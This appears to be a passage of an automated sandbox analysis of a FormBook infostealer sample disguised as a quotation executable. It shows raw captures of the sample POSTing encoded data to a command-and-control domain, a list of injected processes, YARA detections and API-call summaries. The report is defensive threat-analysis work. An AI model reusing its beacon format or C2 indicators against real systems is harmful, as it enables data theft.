0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.11.20	49788	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:21.652122021 CET	819	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 47 47 31 7a 6b 62 76 4b 2f 4e 57 78 72 78 4c 64 46 64 37 6b 3d Data Ascii: cOnShP=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3GG1zkbvK/NWxrxLdFd7k=
Jan 9, 2025 08:35:21.777951002 CET	798	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:35:21 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:35:21 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sifzoGFpWr86kGxj1ptgNURtj4dtfnPVrsFAF0Q8zDVzbYXvskGJfNz08RUoo4pYhiSgXIBoHgdS62YtX6M19gDp091vkBmdHID2rQ4ycDcPbdnAvhhdpvV0xWSzcYBvIQd8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8ff2c008bb4beae6-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.11.20	49789	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:24.292314053 CET	1289	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 31 79 48 73 32 4c 34 6e 33 48 53 38 52 37 48 35 5a 58 42 53 55 36 45 55 4a 41 6e 75 59 57 54 78 79 58 77 63 42 38 72 67 70 75 54 39 49 47 38 71 6f 31 53 6d 6c 59 33 73 51 72 4d 58 54 72 34 45 6f 43 35 4f 6e 6c 62 6b 70 68 53 66 38 33 7a 45 67 51 72 39 41 42 32 73 51 6c 36 79 5a 63 6d 35 35 44 53 68 79 6e 4d 37 32 32 37 79 6d 55 75 74 59 76 61 62 76 74 68 47 36 54 42 59 42 4c 45 31 39 6f 61 44 76 72 58 63 63 44 37 44 32 47 51 4a 50 44 76 36 49 49 35 78 38 64 64 46 6c 39 56 4f 46 41 4e 33 72 64 43 69 4c 56 6e 4e 72 47 68 35 35 73 4c 43 38 75 33 6a 43 68 39 51 4c 67 55 66 4a 65 [TRUNCATED] Data Ascii: cOnShP=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj51yHs2L4n3HS8R7H5ZXBSU6EUJAnuYWTxyXwcB8rgpuT9IG8qo1SmlY3sQrMXTr4EoC5OnlbkphSf83zEgQr9AB2sQl6yZcm55DShynM7227ymUutYvabvthG6TBYBLE19oaDvrXccD7D2GQJPDv6II5x8ddFl9VOFAN3rdCiLVnNrGh55sLC8u3jCh9QLgUfJeKx3lAirVxgQND0gbkRaAAniDbLJz2k7dSWE5yFZEUaOADkKuEIjwTQly/qfGuNnBAyxr04WNyp1odqbRNei/IjZA3bIiEiAr/kHcoGoEtJpqcg6UntDbo6jocQX84qspY1ZJ0p8FcIRT1vNJDVE4yIkImROWLh0Ow8jDdLv2C/L4AFTnDMvjuFGjKA2tHWwhU1caOR82yMGGsacYREDshpiXMixHChlwV1bOcao17swzRzb7K2AoMCULnl9MNGICEJje5+RXGg8i6QV110SIWi61SuI8K4BfjCwXJlsUkE3ARHZysswkg3cquqA9PBCyWdUxfhjhykrYqasrWAXAv2pSybc06Z6XLD
Jan 9, 2025 08:35:24.292362928 CET	1289	OUT	Data Raw: 73 54 49 36 7a 74 46 59 2b 4d 71 38 47 71 2f 50 33 7a 51 54 42 78 54 6a 48 71 4c 67 72 2b 47 2f 74 71 47 6a 4a 73 32 4b 63 37 4a 72 6d 7a 43 32 6b 4b 6c 78 4f 4e 44 62 7a 44 76 30 6a 4c 47 52 58 7a 77 55 47 51 53 55 34 49 41 70 70 41 68 7a 55 72 Data Ascii: sTI6ztFY+Mq8Gq/P3zQTBxTjHqLgr+G/tqGjJs2Kc7JrmzC2kKlxONDbzDv0jLGRXzwUGQSU4IAppAhzUrfdkk4P7w+cqPAu9ofscbQAo+YMfJ2UZeTrNMkVfN59CyZ9uKqp+0xMxVTl2wvSY0d3UfpdsCxJZGCijmJ5PNTOUFnSkZGhfXNiijFWGpedP+MCYqykrbTwfmU1p9NEOkfFHLDtt52WWK+eJVGtzuB2gtVX3hYc052
Jan 9, 2025 08:35:24.292413950 CET	5390	OUT	Data Raw: 4a 34 78 67 34 4d 30 42 7a 4d 6c 4f 71 2b 46 2f 69 75 44 69 49 47 61 50 4a 57 52 46 31 70 64 49 54 58 41 49 7a 64 6e 78 74 2f 72 44 73 6d 51 33 72 66 6b 65 63 41 41 43 35 79 67 59 79 41 31 47 73 46 55 35 6c 63 67 32 38 54 63 41 54 64 4b 6e 71 45 Data Ascii: J4xg4M0BzMlOq+F/iuDiIGaPJWRF1pdITXAIzdnxt/rDsmQ3rfkecAAC5ygYyA1GsFU5lcg28TcATdKnqE1DB8yJKSVpVBLHJ7i9xmFrnlJoGN0tBkMBhetLYM6HwPyXY14vg65Laudks85YxhIu8aVsjdzm1D8a3DRAHCHmP2miBFXgghyV6sNiJFh5hzgChmLiqSEmUxEJrOAfcZvjP3P8XT2DZU9w9R7RQ+KNHnimju9Johy
Jan 9, 2025 08:35:24.423959970 CET	800	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:35:24 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:35:24 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2F2MOhZv2FUw8tO1zOk00a6kEwCzf0Mj9XnlbnlcTSXy05aHTCrZMEpIYPuUm2s0K5JWJYGHovpSi0RtcwpB6BRmeQfv4Sg8kmGi47tFWIb7ubOKPxdYEAsz5FFMIkv0Cxjy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8ff2c019383ae234-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.11.20	49790	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:35:26.933732033 CET	540	OUT	GET /kj1o/?NvA=qUwPQPTQmTwyizTU&cOnShP=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:35:27.063972950 CET	795	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:35:27 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:35:27 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3NJAAMUl1ul%2BRKOo9gg5jMi87xdowCdFTE41OckNB2%2FFEjz0XXl9r8%2BOvTslaA6kjdOU%2FTBo%2FUUEqde3Hgmnd6f%2F7KmCWxNjg9YEWlwtgp8Fv%2F%2FSJ%2Ff4keBX9EBfmLVBV5%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2c029b9f51257-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Target ID:	0
Start time:	02:28:52
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\QUOTATION#050125.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION#050125.exe"
Imagebase:	0x480000
File size:	1'747'456 bytes
MD5 hash:	824144CA67EE2CEA4AE60D3C2367785D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:28:53
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION#050125.exe"
Imagebase:	0x7b0000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2649523005.0000000009250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:29:45
Start date:	09/01/2025
Path:	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
Imagebase:	0x140000000
File size:	16'696'840 bytes
MD5 hash:	731FB4B2E5AFBCADAABB80D642E056AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:29:46
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\cmdkey.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmdkey.exe"
Imagebase:	0x5a0000
File size:	17'408 bytes
MD5 hash:	6CDC8E5DF04752235D5B4432EACC81A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.6080645951.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.6080568851.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	02:30:11
Start date:	09/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff69a340000
File size:	597'432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	4.9%
Total number of Nodes:	1748
Total number of Limit Nodes:	49

Executed Functions

Function 004842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0048430D
GetCurrentProcess.KERNEL32(?,0051CB64,00000000,?,?), ref: 00484422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00484429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00484454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00484466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00484474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0048447B
GetSystemInfo.KERNEL32(?,?,?), ref: 004844A0

Strings

GetNativeSystemInfo, xrefs: 00484460
kernel32.dll, xrefs: 0048444F
|O, xrefs: 004C36F8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 2834427828-3101561225
Opcode ID: c4f059e63a8b9872f62ffd843f2f93ef504af0e4c883b373fcdaf0557f79d410
Instruction ID: 835fb68f527ea5b0e647204c6bf5dddb32ef85fa981d9cd986a71e8e32ac3eb1
Opcode Fuzzy Hash: c4f059e63a8b9872f62ffd843f2f93ef504af0e4c883b373fcdaf0557f79d410
Instruction Fuzzy Hash: 4AA1047590ABD0CFC711DB68BC707993FA46F76746B1A8C9ED04193B21D228490DEB2E

Function 004842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004850AA,?,?,00000000,00000000), ref: 004842B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004850AA,?,?,00000000,00000000), ref: 004842C9
LoadResource.KERNEL32(?,00000000,?,?,004850AA,?,?,00000000,00000000,?,?,?,?,?,?,00484F20), ref: 004C35BE
SizeofResource.KERNEL32(?,00000000,?,?,004850AA,?,?,00000000,00000000,?,?,?,?,?,?,00484F20), ref: 004C35D3
LockResource.KERNEL32(004850AA,?,?,004850AA,?,?,00000000,00000000,?,?,?,?,?,?,00484F20,?), ref: 004C35E6

Strings

SCRIPT, xrefs: 004842BF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 40033aa5086da14a654a2a332f4c5d318ce21c6b295cbf9d1500989945ff220e
Instruction ID: 0503a8e1752fba7df2792a49780f55811e14ccdb5b8efdef10ae400d223dd48c
Opcode Fuzzy Hash: 40033aa5086da14a654a2a332f4c5d318ce21c6b295cbf9d1500989945ff220e
Instruction Fuzzy Hash: 0A11AC74240305BFE7219B65DC48F6B7FB9EBD9B95F1085AAF412C6290DB72D8049620

Function 004C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00482B6B

Part of subcall function 00483A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00551418,?,00482E7F,?,?,?,00000000), ref: 00483A78

GetForegroundWindow.USER32(runas,?,?,?,?,?,00542224), ref: 004C2C10
ShellExecuteW.SHELL32(00000000,?,?,00542224), ref: 004C2C17

Strings

runas, xrefs: 004C2C0B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow
String ID: runas
API String ID: 3686610399-4000483414
Opcode ID: f5fa5bbc522294b8af22a1a27217f03d74092a203bfa4359e57db02f6e88e703
Instruction ID: 829593725c97ef9bfea1f35bf455d701adb3976f33aea9297c269e1d75ba37fd
Opcode Fuzzy Hash: f5fa5bbc522294b8af22a1a27217f03d74092a203bfa4359e57db02f6e88e703
Instruction Fuzzy Hash: 6C11DA311087019ACB04FF61D951EBE7FA4ABA174AF445C2FF442120A2DFAD9A4ED71A

Function 0048BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#U, xrefs: 004D07CE

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#U
API String ID: 3964851224-236479320
Opcode ID: 4550a00b8092c5f88bfc64567b26f4b362c3f40e3e3cd688d9d105db651cc887
Instruction ID: 9c50f6bd1df5e58f3052cf5e5ad1dc94e664670e64a6d081edd7f978f3b18655
Opcode Fuzzy Hash: 4550a00b8092c5f88bfc64567b26f4b362c3f40e3e3cd688d9d105db651cc887
Instruction Fuzzy Hash: B5A25D706083019FD710DF15C490B2ABBE1BF89304F14896FE99A9B352D779EC45CBAA

Function 0048D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0048D807
timeGetTime.WINMM ref: 0048DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048DB28
TranslateMessage.USER32(?), ref: 0048DB7B
DispatchMessageW.USER32(?), ref: 0048DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048DB9F
Sleep.KERNEL32(0000000A), ref: 0048DBB1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 27b5b893c0f8fdca06f16d27618ac079251a4bab11d90b30e30ddf98c879ace4
Instruction ID: 59fd58433d94756290409ed3349fc7d12180a8848abcdb13dad64cd9aeafe767
Opcode Fuzzy Hash: 27b5b893c0f8fdca06f16d27618ac079251a4bab11d90b30e30ddf98c879ace4
Instruction Fuzzy Hash: 2442F170A05341AFDB28EF24C854BAEBBE0BF55314F14891FE45587391D7B8E848DB8A

Function 00482CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00482D07
RegisterClassExW.USER32(00000030), ref: 00482D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00482D42
InitCommonControlsEx.COMCTL32(?), ref: 00482D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00482D6F
LoadIconW.USER32(000000A9), ref: 00482D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00482D94

Strings

TaskbarCreated, xrefs: 00482D37
0, xrefs: 00482CE9
+, xrefs: 00482CF0
AutoIt v3 GUI, xrefs: 00482D23

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 4f0f4728a64e40ba342b46873da97e6119719ae01da3850f452607c6ff154dd4
Instruction ID: ebce21a5f254c6e7906b3bc1c697f745a1cd44ab21b12aa86261b04dd8769680
Opcode Fuzzy Hash: 4f0f4728a64e40ba342b46873da97e6119719ae01da3850f452607c6ff154dd4
Instruction Fuzzy Hash: 5121E0B5941308AFDB00DFA4E899BDDBFB4FB18702F00811AF511A62A0D7B25548EF94

Function 00482B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00482B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00482B9D
LoadIconW.USER32(00000063), ref: 00482BB3
